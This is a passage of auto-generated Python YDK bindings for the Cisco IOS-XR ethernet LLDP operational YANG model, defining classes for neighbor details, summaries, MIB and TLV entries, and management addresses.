**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB nieghbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined cpabilities
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib, self).__init__()
self.yang_name = "mib"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList))])
self._leafs = OrderedDict([
('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
])
self.rem_time_mark = None
self.rem_local_port_num = None
self.rem_index = None
self.chassis_id_sub_type = None
self.chassis_id_len = None
self.port_id_sub_type = None
self.port_id_len = None
self.combined_capabilities = None
self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList()
self.unknown_tlv_list.parent = self
self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList()
self.org_def_tlv_list.parent = self
self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
self._segment_path = lambda: "mib"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib, ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities'], name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
self.yang_name = "unknown-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
self._leafs = OrderedDict()
self.lldp_unknown_tlv_entry = YList(self)
self._segment_path = lambda: "unknown-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList, [], name, value)
class LldpUnknownTlvEntry(Entity):
"""
lldp unknown tlv entry
.. attribute:: tlv_type
Unknown TLV type
**type**\: int
**range:** 0..255
.. attribute:: tlv_value
Unknown TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
self.yang_name = "lldp-unknown-tlv-entry"
self.yang_parent_name = "unknown-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.tlv_type = None
self.tlv_value = None
self._segment_path = lambda: "lldp-unknown-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
self.yang_name = "org-def-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
self._leafs = OrderedDict()
self.lldp_org_def_tlv_entry = YList(self)
self._segment_path = lambda: "org-def-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList, [], name, value)
class LldpOrgDefTlvEntry(Entity):
"""
lldp org def tlv entry
.. attribute:: oui
Organizationally Unique Identifier
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_subtype
Org Def TLV subtype
**type**\: int
**range:** 0..255
.. attribute:: tlv_info_indes
lldpRemOrgDefInfoIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_value
Org Def TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
self.yang_name = "lldp-org-def-tlv-entry"
self.yang_parent_name = "org-def-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.oui = None
self.tlv_subtype = None
self.tlv_info_indes = None
self.tlv_value = None
self._segment_path = lambda: "lldp-org-def-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Summaries(Entity):
"""
The LLDP neighbor summary table
.. attribute:: summary
Brief information about a LLDP neighbor entry
**type**\: list of :py:class:`Summary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries, self).__init__()
self.yang_name = "summaries"
self.yang_parent_name = "neighbors"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("summary", ("summary", Lldp.Nodes.Node.Neighbors.Summaries.Summary))])
self._leafs = OrderedDict()
self.summary = YList(self)
self._segment_path = lambda: "summaries"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries, [], name, value)
class Summary(Entity):
"""
Brief information about a LLDP neighbor
entry
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary, self).__init__()
self.yang_name = "summary"
self.yang_parent_name = "summaries"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
])
self.interface_name = None
self.device_id = None
self.lldp_neighbor = YList(self)
self._segment_path = lambda: "summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary, ['interface_name', 'device_id'], name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail>`
.. attribute:: mib
MIB nieghbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor, self).__init__()
self.yang_name = "lldp-neighbor"
self.yang_parent_name = "summary"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib))])
self._leafs = OrderedDict([
('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('platform', (YLeaf(YType.str, 'platform'), ['str'])),
])
self.receiving_interface_name = None
self.receiving_parent_interface_name = None
self.device_id = None
self.chassis_id = None
self.port_id_detail = None
self.header_version = None
self.hold_time = None
self.enabled_capabilities = None
self.platform = None
self.detail = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail()
self.detail.parent = self
self._children_name_map["detail"] = "detail"
self.mib = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib()
self.mib.parent = self
self._children_name_map["mib"] = "mib"
self._segment_path = lambda: "lldp-neighbor"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor, ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform'], name, value)
class Detail(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses))])
self._leafs = OrderedDict([
('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
])
self.peer_mac_address = None
self.port_description = None
self.system_name = None
self.system_description = None
self.time_remaining = None
self.system_capabilities = None
self.enabled_capabilities = None
self.auto_negotiation = None
self.physical_media_capabilities = None
self.media_attachment_unit_type = None
self.port_vlan_id = None
self.network_addresses = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses()
self.network_addresses.parent = self
self._children_name_map["network_addresses"] = "network-addresses"
self._segment_path = lambda: "detail"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail, ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id'], name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses, self).__init__()
self.yang_name = "network-addresses"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB nieghbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined cpabilities
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib, self).__init__()
self.yang_name = "mib"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList))])
self._leafs = OrderedDict([
('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
])
self.rem_time_mark = None
self.rem_local_port_num = None
self.rem_index = None
self.chassis_id_sub_type = None
self.chassis_id_len = None
self.port_id_sub_type = None
self.port_id_len = None
self.combined_capabilities = None
self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList()
self.unknown_tlv_list.parent = self
self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.OrgDefTlvList()
self.org_def_tlv_list.parent = self
self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
self._segment_path = lambda: "mib"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib, ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities'], name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
self.yang_name = "unknown-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
self._leafs = OrderedDict()
self.lldp_unknown_tlv_entry = YList(self)
self._segment_path = lambda: "unknown-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Summaries.Summary.LldpNeighbor.Mib.UnknownTlvList, [], name, value)
class LldpUnknownTlvEntry(Entity):
"""
lldp unknown tlv entry
.. attribute:: tlv_type
Unknown TLV type
**type**\: int
**range:** 0..255
.. attribute:: tlv_value
Unknown TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
